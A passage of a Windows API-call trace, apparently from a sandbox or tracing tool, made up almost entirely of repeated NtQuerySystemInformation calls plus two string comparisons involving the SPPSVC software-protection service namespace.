Length=0x50, ResultLength=0x0) [0289.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0289.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0289.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0289.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0289.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0289.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0289.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0289.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0289.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0289.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0289.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0289.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0289.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0289.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0289.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0289.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0289.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0289.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0289.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0289.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0289.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0289.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0289.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0289.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0289.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0289.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0289.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0289.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0289.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0289.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0289.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0289.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0289.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0289.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0289.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0289.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0289.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0289.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0289.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0289.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0289.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0289.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0289.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0289.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0289.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0289.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0289.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0289.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0289.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf70, Length=0x28, ResultLength=0x0) [0289.137] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0289.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0289.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0289.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0289.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0289.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0289.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0289.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0289.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x28, ResultLength=0x0) [0289.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0289.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0289.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0289.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x20, ResultLength=0x0) [0289.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0289.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0289.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0289.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0289.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0289.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0289.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0289.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0289.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x40, ResultLength=0x0) [0289.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0289.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0289.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0289.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0289.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea8, Length=0x30, ResultLength=0x0) [0289.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x38, ResultLength=0x0) [0289.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0289.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0289.260] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0289.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0289.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0289.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0289.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0289.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0289.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0289.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0289.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0289.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0289.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0289.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0289.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0289.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0289.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.274] NtQuerySystemInformation 